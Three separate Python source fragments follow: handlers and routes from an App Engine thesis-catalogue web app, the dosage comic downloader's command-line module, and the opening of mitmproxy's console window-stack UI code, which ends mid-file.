                if user.is_admin:
                    logout_url = users.create_logout_url('/')
                    link_text = 'Logout'
                    department = Department.get_by_id(id)
                    # Default both to None so the template data is defined even
                    # when the department has no college/chair assigned yet
                    # (previously these names were unbound in that case).
                    college = None
                    chairperson = None
                    if department.department_college is not None:
                        college = College.query(College.key == department.department_college)
                        college = college.get()
                        college = college.college_name
                    if department.department_chair is not None:
                        chairperson = Faculty.query(Faculty.key == department.department_chair)
                        chairperson = chairperson.get()
                        chairperson = chairperson.faculty_full
                    # Admin navigation links (List / Create Entry per section).
                    links = {}
                    links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
                    links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
                    links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
                    links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
                    links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
                    links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
                    data = {
                        'links':links,
                        'item' : department,
                        'college' : college,
                        'chairperson':chairperson,
                        'logout_url':logout_url,
                        'user':user.first_name
                    }
                    logging.info(data)
                    template = JINJA_ENVIRONMENT.get_template('/pages/departmentedit.html')
                    self.response.write(template.render(data))
                else:
                    self.redirect('/')
            else:
                self.redirect('/register')
        else:
            login_url = users.create_login_url('/login')
            template_values = {
                'login_url':login_url,
                'reg_url':'/register'
            }
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render(template_values))

    def post(self, id):
        """Persist edits to the department and keep its college's
        ``college_departments`` list in sync. Responds with JSON."""
        department = Department()
        department_college_temp = College.query(College.college_name == self.request.get('department_college'))
        department_college_temp = department_college_temp.get()
        department_college_key = department_college_temp.key
        department_chair_temp = Faculty.query(Faculty.faculty_full == self.request.get('department_chair'))
        department_chair_temp = department_chair_temp.get()
        department_chair_key = department_chair_temp.key
        department.department_college = ndb.Key('College', department_college_key.id())
        department.department_name = self.request.get('department_name')
        department.department_chair = ndb.Key('Faculty', department_chair_key.id())
        # Reuse the URL id so put() overwrites the existing entity.
        department.key = ndb.Key(Department, id)
        department.put()
        college = College.query(College.key == department.department_college)
        c = college.get()
        logging.info(c)
        if c is not None:
            collegelist = c.college_departments
            logging.info(collegelist)
            # Only append when missing -- previously every edit appended the
            # key again, accumulating duplicates in college_departments.
            if department.key not in collegelist:
                collegelist.append(department.key)
                c.college_departments = collegelist
                c.put()
        self.response.headers['Content-Type'] = 'application/json'
        response = {
            'result':'OK',
            'data':{
                'department_name': department.department_name
            }
        }
        self.response.out.write(json.dumps(response))
class ThesisDeleteHandler(webapp2.RequestHandler):
    """Deletes a single thesis entry identified by its numeric id."""

    def post(self, id):
        """Remove the thesis entity and acknowledge with a JSON payload."""
        entry = thesisentry.get_by_id(int(id))
        entry.key.delete()
        self.response.headers['Content-Type'] = 'application/json'
        self.response.out.write(json.dumps({'result': 'OK'}))
class ThesisEditHandler(webapp2.RequestHandler):
    """Shows the edit form for a thesis (GET) and applies edits (POST)."""

    def get(self, id):
        """Render the thesis edit page for admin users.

        Non-admins are redirected to '/', users without a profile to
        '/register', and anonymous visitors get the login page.
        """
        loggedin_user = users.get_current_user()
        if loggedin_user:
            user_key = ndb.Key('User', loggedin_user.user_id())
            user = user_key.get()
            if user:
                if user.is_admin:
                    logout_url = users.create_logout_url('/')
                    link_text = 'Logout'
                    # Admin navigation links (List / Create Entry per section).
                    links = {}
                    links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
                    links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
                    links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
                    links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
                    links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
                    links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
                    thesis = thesisentry.get_by_id(int(id))
                    adviser = Faculty.get_by_id(thesis.thesis_adviser.id())
                    adviser = adviser.faculty_full
                    # Resolve proponent keys to full student names.
                    proponents = []
                    for t in thesis.thesis_proponent:
                        p = Student.get_by_id(t.id())
                        proponents.append(p.student_full)
                    department = Department.get_by_id(thesis.thesis_department.id())
                    department = department.department_name
                    template_values = {
                        'links' : links,
                        'id': id,
                        'proponents':proponents,
                        'adviser':adviser,
                        'department':department,
                        'thesis':thesis,
                        'logout_url':logout_url,
                        'user':user.first_name
                    }
                    template = JINJA_ENVIRONMENT.get_template('/pages/thesisedit.html')
                    self.response.write(template.render(template_values))
                else:
                    self.redirect('/')
            else:
                self.redirect('/register')
        else:
            login_url = users.create_login_url('/login')
            template_values = {
                'login_url':login_url,
                'reg_url':'/register'
            }
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render(template_values))

    def post(self, id):
        """Persist edits to the thesis entry and respond with JSON.

        Proponent names are read from indexed fields thesis_proponent_0,
        thesis_proponent_1, ... until the first missing/blank one; each name
        is matched against students first, then faculty.
        """
        thesis = thesisentry()
        loggedin_user = users.get_current_user()
        user_key = ndb.Key('User', loggedin_user.user_id())
        thesis_proponents = []
        i = 0
        while self.request.get('thesis_proponent_' + str(i)) is not None and self.request.get('thesis_proponent_' + str(i)) != '':
            thesis_proponent_temp = Student.query(Student.student_full == self.request.get('thesis_proponent_' + str(i)))
            if thesis_proponent_temp.count():
                thesis_proponent_temp = thesis_proponent_temp.get()
                thesis_proponents.append(thesis_proponent_temp.key)
            else:
                # Not a student: fall back to matching a faculty member.
                thesis_proponent_temp = Faculty.query(Faculty.faculty_full == self.request.get('thesis_proponent_' + str(i)))
                if thesis_proponent_temp.count():
                    thesis_proponent_temp = thesis_proponent_temp.get()
                    thesis_proponents.append(thesis_proponent_temp.key)
                else:
                    thesis_proponents.append(None)
            i += 1
        logging.info(thesis_proponents)
        thesis_adviser_temp = Faculty.query(Faculty.faculty_full == self.request.get('thesis_adviser'))
        thesis_adviser_temp = thesis_adviser_temp.get()
        thesis_adviser_key = thesis_adviser_temp.key
        thesis_department_temp = Department.query(Department.department_name == self.request.get('thesis_department'))
        thesis_department_temp = thesis_department_temp.get()
        thesis_department_key = thesis_department_temp.key
        thesis.thesis_author = user_key
        thesis.thesis_year = self.request.get('thesis_year')
        thesis.thesis_title = self.request.get('thesis_title')
        thesis.thesis_abstract = self.request.get('thesis_abstract')
        thesis.thesis_adviser = ndb.Key('Faculty', thesis_adviser_key.id())
        thesis.thesis_section = self.request.get('thesis_section')
        thesis.thesis_proponent = thesis_proponents
        thesis.thesis_department = ndb.Key('Department', thesis_department_key.id())
        # Reuse the URL id so put() overwrites the existing entity.
        thesis.key = ndb.Key(thesisentry, int(id))
        # Rebuild search tags from title words of 3+ characters.
        tags = []
        for t in thesis.thesis_title.split():
            if len(t) >= 3 and t not in tags:
                tags.append(t)
        thesis.thesis_tags = tags
        thesis.put()
        # Fetch the author once; the old code concatenated the User entity
        # itself with a string ('author': user_key.get() + ...), which raises
        # TypeError. The intended value is "first_name last_name".
        author = user_key.get()
        self.response.headers['Content-Type'] = 'application/json'
        response = {
            'result': 'OK',
            'data': {
                'id' : thesis.key.urlsafe(),
                'year': thesis.thesis_year,
                'title': thesis.thesis_title,
                'abstract': thesis.thesis_abstract,
                'section': thesis.thesis_section,
                'author': author.first_name + ' ' + author.last_name
            }
        }
        self.response.out.write(json.dumps(response))
class ThesisListAll(webapp2.RequestHandler):
    """Lists all thesis entries for any registered user."""

    def get(self):
        """Render the thesis list page.

        Admins and regular users share the same template; admins additionally
        get 'Create Entry' navigation links. Users without a profile are
        redirected to '/register'; anonymous visitors get the login page.
        (The old code duplicated the whole branch for admin/non-admin.)
        """
        loggedin_user = users.get_current_user()
        if loggedin_user:
            user_key = ndb.Key('User', loggedin_user.user_id())
            user = user_key.get()
            if user:
                # Every registered user can list entities.
                links = {}
                links['Faculty'] = {'List':'/faculty/list'}
                links['Students'] = {'List':'/student/list'}
                links['Department'] = {'List':'/department/list'}
                links['Universities'] = {'List':'/university/list'}
                links['Colleges'] = {'List':'/college/list'}
                links['Theses'] = {'List':'/thesis/list/all'}
                if user.is_admin:
                    # Admins may also create new entries.
                    links['Faculty']['Create Entry'] = '/faculty/create'
                    links['Students']['Create Entry'] = '/student/create'
                    links['Department']['Create Entry'] = '/department/create'
                    links['Universities']['Create Entry'] = '/university/create'
                    links['Colleges']['Create Entry'] = '/college/create'
                    links['Theses']['Create Entry'] = '/thesis/create'
                template_values = {
                    'links':links,
                    'search_url':'/search',
                    'logout_url': users.create_logout_url('/'),
                    'user': user.first_name
                }
                template = JINJA_ENVIRONMENT.get_template('/pages/thesislist.html')
                self.response.write(template.render(template_values))
            else:
                self.redirect('/register')
        else:
            login_url = users.create_login_url('/login')
            template_values = {
                'login_url':login_url,
                'reg_url':'/register'
            }
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render(template_values))
class ThesisListFilter(webapp2.RequestHandler):
    """Lists theses filtered by a URL value: a year, a Faculty id, or a
    University id (tried in that order)."""

    def get(self, value):
        """Render the filtered thesis list for registered users."""
        loggedin_user = users.get_current_user()
        if loggedin_user:
            user_key = ndb.Key('User', loggedin_user.user_id())
            user = user_key.get()
            if user:
                logging.info(value)
                # First interpretation: *value* is a publication year.
                thesisdet = thesisentry.query(thesisentry.thesis_year == value).fetch()
                selected = value
                if len(thesisdet) == 0:
                    # Second interpretation: a Faculty id (filter by adviser).
                    faculty = Faculty.get_by_id(value)
                    logging.info(faculty)
                    if faculty is not None and len(thesisentry.query(thesisentry.thesis_adviser == faculty.key).fetch()) != 0:
                        thesisdet = thesisentry.query(thesisentry.thesis_adviser == faculty.key).fetch()
                        selected = faculty.faculty_full
                    else:
                        # Last interpretation: a University id.
                        # NOTE(review): only the first college of the
                        # university and the first department of that college
                        # are consulted, and a missing university would raise
                        # AttributeError -- confirm this is intended.
                        university = University.get_by_id(value)
                        college = College.query(College.college_university == university.key)
                        college = college.get()
                        department = Department.query(Department.department_college == college.key)
                        department = department.get()
                        thesisdet = thesisentry.query(thesisentry.thesis_department == department.key).fetch()
                        selected = university.university_name
                logout_url = users.create_logout_url('/')
                link_text = 'Logout'
                template_values = {
                    'thesis': thesisdet,
                    'selected': selected,
                    'logout_url':logout_url,
                    'user':user.first_name
                }
                template = JINJA_ENVIRONMENT.get_template('/pages/thesislistfiltered.html')
                self.response.write(template.render(template_values))
            else:
                self.redirect('/register')
        else:
            login_url = users.create_login_url('/login')
            template_values = {
                'login_url':login_url,
                'reg_url':'/register'
            }
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render(template_values))
class ThesisDetailsHandler(webapp2.RequestHandler):
    """Shows the detail page for a single thesis entry."""

    def _load_details(self, id):
        """Fetch the thesis plus the resolved data the detail page needs.

        Returns (thesis, adviser_name, proponent_names, related_theses);
        related theses share at least one title tag with this one.
        """
        thesis = thesisentry.get_by_id(int(id))
        adviser = Faculty.get_by_id(thesis.thesis_adviser.id())
        adviser = adviser.faculty_full
        proponents = []
        for t in thesis.thesis_proponent:
            p = Student.get_by_id(t.id())
            proponents.append(p.student_full)
        related = thesisentry.query(thesisentry.thesis_tags.IN(thesis.thesis_tags)).fetch()
        return thesis, adviser, proponents, related

    def get(self, id):
        """Render the thesis detail page.

        Admins additionally get navigation links and a working edit link;
        other users get a placeholder edit link. (The old code duplicated
        the entire lookup for the two cases.)
        """
        loggedin_user = users.get_current_user()
        if loggedin_user:
            user_key = ndb.Key('User', loggedin_user.user_id())
            user = user_key.get()
            if user:
                logout_url = users.create_logout_url('/')
                thesis, adviser, proponents, related = self._load_details(id)
                template_values = {
                    'related':related,
                    'proponents':proponents,
                    'adviser':adviser,
                    'thesis':thesis,
                    'logout_url':logout_url,
                    'user':user.first_name
                }
                if user.is_admin:
                    links = {}
                    links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
                    links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
                    links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
                    links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
                    links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
                    links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
                    template_values['links'] = links
                    template_values['edit_link'] = {'Edit Thesis Entry': '/thesis/' + id + '/edit'}
                else:
                    # Placeholder so the template can always render edit_link.
                    template_values['edit_link'] = {'': '#'}
                template = JINJA_ENVIRONMENT.get_template('/pages/thesisdetail.html')
                self.response.write(template.render(template_values))
            else:
                self.redirect('/register')
        else:
            login_url = users.create_login_url('/login')
            template_values = {
                'login_url':login_url,
                'reg_url':'/register'
            }
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render(template_values))
class SearchHandler(webapp2.RequestHandler):
    """Serves the search page (GET) and performs searches (POST)."""

    def get(self):
        """Render the search page for registered users.

        Admins additionally get 'Create Entry' navigation links. (The old
        code duplicated the whole branch for admin/non-admin.)
        """
        loggedin_user = users.get_current_user()
        if loggedin_user:
            user_key = ndb.Key('User', loggedin_user.user_id())
            user = user_key.get()
            if user:
                links = {}
                links['Faculty'] = {'List':'/faculty/list'}
                links['Students'] = {'List':'/student/list'}
                links['Department'] = {'List':'/department/list'}
                links['Universities'] = {'List':'/university/list'}
                links['Colleges'] = {'List':'/college/list'}
                links['Theses'] = {'List':'/thesis/list/all'}
                if user.is_admin:
                    # Admins may also create new entries.
                    links['Faculty']['Create Entry'] = '/faculty/create'
                    links['Students']['Create Entry'] = '/student/create'
                    links['Department']['Create Entry'] = '/department/create'
                    links['Universities']['Create Entry'] = '/university/create'
                    links['Colleges']['Create Entry'] = '/college/create'
                    links['Theses']['Create Entry'] = '/thesis/create'
                template_values = {
                    'links':links,
                    'search_url':'/search',
                    'logout_url': users.create_logout_url('/'),
                    'user': user.first_name
                }
                template = JINJA_ENVIRONMENT.get_template('/pages/search.html')
                self.response.write(template.render(template_values))
            else:
                self.redirect('/register')
        else:
            login_url = users.create_login_url('/login')
            template_values = {
                'login_url':login_url,
                'reg_url':'/register'
            }
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render(template_values))

    def post(self):
        """Search theses by tag keywords, falling back to proponent names.

        Responds with JSON mapping matching thesis titles to their ids.
        """
        keyword = (self.request.get('search_keyword')).lower().split()
        results = []
        # Guard the IN() queries: ndb rejects an empty candidate list.
        if keyword:
            results = thesisentry.query(thesisentry.thesis_tags.IN(keyword)).fetch()
            if len(results) == 0:
                # No tag hits: try the keywords against student name
                # portions and search theses by proponent instead.
                stud_res = Student.query(Student.student_name_portions.IN(keyword)).fetch()
                keys = [s.key for s in stud_res]
                if keys:
                    results = thesisentry.query(thesisentry.thesis_proponent.IN(keys)).fetch()
        logging.info(results)
        search_results = {}
        for r in results:
            search_results[r.thesis_title] = r.key.id()
        # Fix: the header value used to be the invalid 'application.json'.
        self.response.headers['Content-Type'] = 'application/json'
        response = {
            'result':'OK',
            'data': search_results
        }
        self.response.out.write(json.dumps(response))
# URL route table. webapp2 matches routes in declaration order, so the
# catch-all '(.*)' patterns for each entity are listed AFTER their more
# specific '/delete', '/edit' and '/list' siblings to avoid shadowing them.
app = webapp2.WSGIApplication([
    ('/api/thesis', APIHandler),
    ('/register', RegistrationHandler),
    ('/login', LoginHandler),
    ('/home', MainPageHandler),
    # Entity creation pages.
    ('/thesis/create', ThesisPageHandler),
    ('/faculty/create', FacultyHandler),
    ('/student/create', StudentHandler),
    ('/university/create', UniversityHandler),
    ('/college/create', CollegeHandler),
    ('/department/create', DepartmentHandler),
    ('/data/import', DataImportHandler),
    ('/setup', SetupHandler),
    # Listing pages and their JSON endpoints.
    ('/faculty/list', FacultyListHandler),
    ('/faculty/api', FacultyAPIHandler),
    ('/thesis/create/api', ThesisCreateAPI),
    ('/student/api', StudentsAPIHandler),
    ('/student/list', StudentListHandler),
    ('/university/api', UniversityAPIHandler),
    ('/university/list', UniversityListHandler),
    ('/college/api', CollegeAPIHandler),
    ('/college/list', CollegeListHandler),
    ('/department/api', DepartmentAPIHandler),
    ('/department/list', DepartmentListHandler),
    # Per-entity delete/edit routes; the bare '(.*)' route doubles as the
    # edit (or detail) page for the captured id.
    ('/faculty/(.*)/delete', FacultyDeleteHandler),
    ('/faculty/(.*)', FacultyEditHandler),
    ('/student/(.*)/delete', StudentDeleteHandler),
    ('/student/(.*)', StudentEdithandler),
    ('/university/(.*)/delete', UniversityDeleteHandler),
    ('/university/(.*)', UniversityEditHandler),
    ('/college/(.*)/delete', CollegeDeleteHandler),
    ('/college/(.*)', CollegeEditHandler),
    ('/department/(.*)/delete', DepartmentDeleteHandler),
    ('/department/(.*)', DepartmentEditHandler),
    ('/thesis/(.*)/delete', ThesisDeleteHandler),
    ('/thesis/(.*)/edit', ThesisEditHandler),
    ('/thesis/list/all', ThesisListAll),
    ('/thesis/list/(.*)', ThesisListFilter),
    ('/thesis/(.*)', ThesisDetailsHandler),
    ('/search', SearchHandler),
    ('/', MainPageHandler)
], debug=True)
|
|
# SPDX-License-Identifier: MIT
# Copyright (C) 2004-2008 Tristan Seligmann and Jonathan Jacobs
# Copyright (C) 2012-2014 Bastian Kleineidam
# Copyright (C) 2015-2020 Tobias Gruetzmacher
import argparse
import contextlib
import os
import platform
from pathlib import Path
import appdirs
from . import events, configuration, singleton, director
from . import AppName, __version__
from .output import out
from .scraper import scrapers as allscrapers
from .util import internal_error, strlimit
class ArgumentParser(argparse.ArgumentParser):
    """Argument parser that pages its (potentially long) help output."""

    def print_help(self, file=None):
        """Show the formatted help text through the output pager."""
        with out.pager():
            help_text = self.format_help()
            out.info(help_text)
Examples = """\
EXAMPLES
List available comics:
dosage -l
Get the latest comic of for example CalvinAndHobbes and save it in the "Comics"
directory:
dosage CalvinAndHobbes
If you already have downloaded several comics and want to get the latest
strips of all of them:
dosage --continue @
"""
# Making our config roaming seems sensible
userdirs = appdirs.AppDirs(appname=AppName, appauthor=False, roaming=True)
def setup_options():
    """Construct option parser.

    @return: new option parser
    @rtype argparse.ArgumentParser
    """
    parser = ArgumentParser(
        description="A comic downloader and archiver.",
        epilog=Examples,
        formatter_class=argparse.RawDescriptionHelpFormatter)
    parser.add_argument('-v', '--verbose', action='count', default=0,
        help='provides verbose output, use multiple times for more verbosity')
    parser.add_argument('-n', '--numstrips', action='store', type=int, default=0,
        help='traverse and retrieve the given number of comic strips;'
        ' use --all to retrieve all comic strips')
    parser.add_argument('-a', '--all', action='store_true',
        help='traverse and retrieve all comic strips')
    parser.add_argument('-c', '--continue', action='store_true', dest='cont',
        help='traverse and retrieve comic strips until an existing one is found')
    # Typo fixed: "invidivual" -> "individual".
    parser.add_argument('-b', '--basepath', action='store', default='Comics',
        metavar='PATH',
        help='set the path to create individual comic directories in, default is Comics')
    # Help text fixed: the related option is --basepath, not --base-path.
    parser.add_argument('--baseurl', action='store', metavar='PATH',
        help='the base URL of your comics directory (for RSS, HTML, etc.);'
        ' this should correspond to --basepath')
    parser.add_argument('-l', '--list', action='store_true',
        help='list available comic modules')
    parser.add_argument('--singlelist', action='store_true',
        help='list available comic modules in a single column list')
    parser.add_argument('--version', action='store_true',
        help='display the version number')
    parser.add_argument('--vote', action='store_true',
        help='vote for the selected comics')
    parser.add_argument('-m', '--modulehelp', action='store_true',
        help='display help for comic modules')
    parser.add_argument('-t', '--timestamps', action='store_true',
        help='print timestamps for all output at any info level')
    parser.add_argument('-o', '--output', action='append', dest='handler',
        choices=events.getHandlerNames(),
        help='sets output handlers for downloaded comics')
    parser.add_argument('--no-downscale', action='store_false',
        dest='allowdownscale',
        help='prevent downscaling when using html or rss handler')
    parser.add_argument('-p', '--parallel', action='store', type=int, default=1,
        help='fetch comics in parallel. Specify the number of connections')
    parser.add_argument('--adult', action='store_true',
        help='confirms that you are old enough to view adult content')
    parser.add_argument('--allow-multiple', action='store_true',
        help='allows multiple instances to run at the same time.'
        ' Use if you know what you are doing.')
    # used for development testing prev/next matching
    parser.add_argument('--dry-run', action='store_true',
        help=argparse.SUPPRESS)
    # multimatch is only used for development, eg. testing if all comics of
    # a scripted plugin are working
    parser.add_argument('--multimatch', action='store_true',
        help=argparse.SUPPRESS)
    # List all comic modules, even those normally suppressed, because they
    # are not "real" (moved & removed)
    parser.add_argument('--list-all', action='store_true',
        help=argparse.SUPPRESS)
    parser.add_argument('comic', nargs='*',
        help='comic module name (including case insensitive substrings)')
    # Optional shell tab-completion support, if argcomplete is installed.
    try:
        import argcomplete
        argcomplete.autocomplete(parser)
    except ImportError:
        pass
    return parser
def display_version(verbose):
    """Display application name, version, copyright and license.

    With *verbose*, additionally check online for an updated release and
    report the result. Always returns 0.
    """
    print(configuration.App)
    print("Using Python {} ({}) on {}".format(platform.python_version(),
        platform.python_implementation(), platform.platform()))
    print(configuration.Copyright)
    print(configuration.Freeware)
    print("For support see", configuration.SupportUrl)
    if verbose:
        # search for updates
        from .updater import check_update
        result, value = check_update()
        if result:
            if value:
                version, url = value
                if url is None:
                    # current version is newer than online version
                    text = ('Detected local or development version %(currentversion)s. '
                            'Available version of %(app)s is %(version)s.')
                else:
                    # display update link
                    text = ('A new version %(version)s of %(app)s is '
                            'available at %(url)s.')
                attrs = dict(version=version, app=AppName,
                             url=url, currentversion=__version__)
                print(text % attrs)
            else:
                if value is None:
                    value = 'invalid update file syntax'
                # Typo fixed: "occured" -> "occurred".
                text = ('An error occurred while checking for an '
                        'update of %(app)s: %(error)s.')
                attrs = dict(error=value, app=AppName)
                print(text % attrs)
    return 0
def set_output_info(options):
    """Configure the global output object from the parsed CLI options."""
    out.timestamps = options.timestamps
    out.level = 0
    out.level += options.verbose
def display_help(options):
    """Print help for the selected comic strips.

    Returns the number of per-comic errors, or 2 when the selection
    itself is invalid.
    """
    try:
        matched = director.getScrapers(options.comic, options.basepath, listing=True)
        return sum(display_comic_help(scraper) for scraper in matched)
    except ValueError as msg:
        out.exception(msg)
        return 2
def display_comic_help(scraperobj):
    """Print help for a single comic; return 0 on success, 1 on error.

    The output context is temporarily switched to the scraper name and
    always restored afterwards.
    """
    saved_context = out.context
    out.context = scraperobj.name
    try:
        out.info('URL: {}'.format(scraperobj.url))
        out.info('Language: {}'.format(scraperobj.language()))
        if scraperobj.adult:
            out.info(u"Adult comic, use option --adult to fetch.")
        reasons = scraperobj.getDisabledReasons()
        if reasons:
            out.info(u"Disabled: " + " ".join(reasons.values()))
        if scraperobj.help:
            for line in scraperobj.help.splitlines():
                out.info(line)
    except ValueError as msg:
        out.exception(msg)
        return 1
    else:
        return 0
    finally:
        out.context = saved_context
def vote_comics(options):
    """Vote for the selected comics; return the total error count."""
    error_count = 0
    try:
        matched = director.getScrapers(options.comic, options.basepath,
                                       options.adult, options.multimatch)
        for scraperobj in matched:
            error_count += vote_comic(scraperobj)
    except ValueError as msg:
        out.exception(msg)
        error_count += 1
    return error_count
def vote_comic(scraperobj):
    """Vote for one comic scraper; return 0 on success, 1 on error."""
    error_count = 0
    saved_context = out.context
    out.context = scraperobj.name
    try:
        scraperobj.vote()
        out.info(u'Vote submitted.')
    except Exception as msg:
        out.exception(msg)
        error_count = 1
    finally:
        out.context = saved_context
    return error_count
def run(options):
    """Execute comic commands.

    Dispatches, in priority order: version display, module listing,
    module help, voting, and finally the actual comic download.
    Returns a process exit status (0 on success).
    """
    set_output_info(options)
    # ensure only one instance of dosage is running
    if not options.allow_multiple:
        singleton.SingleInstance()
    if options.version:
        return display_version(options.verbose)
    if options.list:
        return do_list()
    if options.singlelist or options.list_all:
        return do_list(column_list=False, verbose=options.verbose,
                       listall=options.list_all)
    # after this a list of comic strips is needed
    if not options.comic:
        out.warn(u'No comics specified, bailing out!')
        return 1
    # Pick up extra comic modules from the user's data directory.
    add_user_scrapers()
    if options.modulehelp:
        return display_help(options)
    if options.vote:
        return vote_comics(options)
    return director.getComics(options)
def add_user_scrapers():
    """Add extra comic modules from the user data directory.

    Two locations are scanned: the system-native user data dir and the
    XDG basedir path. While XDG isn't a thing on macOS and Windows, some
    users (and developers) use these paths cross-platform, so both are
    supported.
    """
    candidates = {userdirs.user_data_dir}
    with xdg_system():
        candidates.add(userdirs.user_data_dir)
    for location in candidates:
        allscrapers.adddir(Path(location) / 'plugins')
@contextlib.contextmanager
def xdg_system():
    """Temporarily force appdirs' platform to "linux2", which implements
    the XDG base dir spec; the original value is always restored."""
    saved_system = appdirs.system
    appdirs.system = 'linux2'
    try:
        yield
    finally:
        appdirs.system = saved_system
def do_list(column_list=True, verbose=False, listall=False):
    """Print the list of available comics through the pager; return 0.

    With column_list the names are laid out in columns, otherwise one per
    line (optionally with full per-comic help when verbose).
    """
    add_user_scrapers()
    with out.pager():
        out.info(u'Available comic scrapers:')
        out.info(u'Comics tagged with [{}] require age confirmation'
            ' with the --adult option.'.format(TAG_ADULT))
        out.info(u'Non-english comics are tagged with [%s].' % TAG_LANG)
        sorted_scrapers = sorted(allscrapers.get(listall),
                                 key=lambda scraper: scraper.name.lower())
        if not column_list:
            num, disabled = do_single_list(sorted_scrapers, verbose=verbose)
        else:
            num, disabled = do_column_list(sorted_scrapers)
        out.info(u'%d supported comics.' % num)
        if disabled:
            out.info('')
            out.info(u'Some comics are disabled, they are tagged with'
                ' [{}:REASON], where REASON is one of:'.format(TAG_DISABLED))
            for tag in disabled:
                out.info(u' %-10s %s' % (tag, disabled[tag]))
    return 0
def do_single_list(scrapers, verbose=False):
    """Print scraper names one per line.

    Returns a (count, disabled-reasons) tuple, matching do_column_list().
    """
    disabled = {}
    for scraperobj in scrapers:
        if verbose:
            display_comic_help(scraperobj)
        else:
            out.info(get_tagged_scraper_name(scraperobj, reasons=disabled))
    # Report the real number of scrapers; the previous "+ 1" overcounted
    # by one relative to do_column_list().
    return len(scrapers), disabled
def do_column_list(scrapers):
    """Print scraper names with multiple names per line.

    Returns a (count, disabled-reasons) tuple.
    """
    disabled = {}
    width = out.width
    # limit name length so at least two columns are there
    limit = (width // 2) - 8
    names = [get_tagged_scraper_name(scraperobj, limit=limit, reasons=disabled)
             for scraperobj in scrapers]
    num = len(names)
    if not names:
        # Guard: max() below raises ValueError on an empty sequence.
        return 0, disabled
    maxlen = max(len(name) for name in names)
    names_per_line = max(width // (maxlen + 1), 1)
    while names:
        out.info(u''.join(name.ljust(maxlen) for name in
                 names[:names_per_line]))
        del names[:names_per_line]
    return num, disabled
TAG_ADULT = "adult"
TAG_LANG = "lang"
TAG_DISABLED = "dis"
def get_tagged_scraper_name(scraperobj, limit=None, reasons=None):
    """Return the scraper name, annotated with status tags.

    Tags mark adult content, non-english language and disabled state. Any
    disabled reasons are merged into *reasons* when a dict is given, and
    the name is shortened to *limit* characters when set.
    """
    annotations = []
    if scraperobj.adult:
        annotations.append(TAG_ADULT)
    if scraperobj.lang != "en":
        annotations.append("%s:%s" % (TAG_LANG, scraperobj.lang))
    disabled = scraperobj.getDisabledReasons()
    if disabled and reasons is not None:
        reasons.update(disabled)
    for reason in disabled:
        annotations.append("%s:%s" % (TAG_DISABLED, reason))
    name = scraperobj.name
    if limit is not None:
        name = strlimit(name, limit)
    if not annotations:
        return name
    return name + " [" + ", ".join(annotations) + "]"
def main(args=None):
    """Parse options and execute commands.

    Returns 0 on success, 1 on user abort, 2 on internal error.
    """
    try:
        parsed = setup_options().parse_args(args=args)
        parsed.basepath = os.path.expanduser(parsed.basepath)
        return run(parsed)
    except KeyboardInterrupt:
        print("Aborted.")
        return 1
    except Exception:
        internal_error()
        return 2
|
|
import re
import urwid
from mitmproxy.tools.console import common
from mitmproxy.tools.console import signals
from mitmproxy.tools.console import statusbar
from mitmproxy.tools.console import flowlist
from mitmproxy.tools.console import flowview
from mitmproxy.tools.console import commands
from mitmproxy.tools.console import keybindings
from mitmproxy.tools.console import options
from mitmproxy.tools.console import overlay
from mitmproxy.tools.console import help
from mitmproxy.tools.console import grideditor
from mitmproxy.tools.console import eventlog
class StackWidget(urwid.Frame):
    """A single window in the stack: the widget plus an optional title bar
    whose styling reflects whether the window has focus."""

    def __init__(self, window, widget, title, focus):
        # Remembered so mouse clicks can switch focus to this pane.
        self.is_focused = focus
        self.window = window
        if title:
            header = urwid.AttrWrap(
                urwid.Text(title),
                "heading" if focus else "heading_inactive"
            )
        else:
            header = None
        super().__init__(
            widget,
            header=header
        )

    def mouse_event(self, size, event, button, col, row, focus):
        # A left-button press on an unfocused pane switches focus to it
        # before the event is handled normally.
        if event == "mouse press" and button == 1 and not self.is_focused:
            self.window.switch()
        return super().mouse_event(size, event, button, col, row, focus)

    def keypress(self, size, key):
        # Make sure that we don't propagate cursor events outside of the widget.
        # Otherwise, in a horizontal layout, urwid's Pile would change the focused widget
        # if we cannot scroll any further.
        ret = super().keypress(size, key)
        command = self._command_map[ret]  # awkward as they don't implement a full dict api
        if command and command.startswith("cursor"):
            return None
        return ret
class WindowStack:
    """A stack of named windows for one pane, plus an optional overlay
    that sits above whatever window is currently on top."""
    def __init__(self, master, base):
        self.master = master
        self.windows = dict(
            flowlist=flowlist.FlowListBox(master),
            flowview=flowview.FlowView(master),
            commands=commands.Commands(master),
            keybindings=keybindings.KeyBindings(master),
            options=options.Options(master),
            help=help.HelpView(master),
            eventlog=eventlog.EventLog(master),
            edit_focus_query=grideditor.QueryEditor(master),
            edit_focus_cookies=grideditor.CookieEditor(master),
            edit_focus_setcookies=grideditor.SetCookieEditor(master),
            edit_focus_setcookie_attrs=grideditor.CookieAttributeEditor(master),
            edit_focus_multipart_form=grideditor.RequestMultipartEditor(master),
            edit_focus_urlencoded_form=grideditor.RequestUrlEncodedEditor(master),
            edit_focus_path=grideditor.PathEditor(master),
            edit_focus_request_headers=grideditor.RequestHeaderEditor(master),
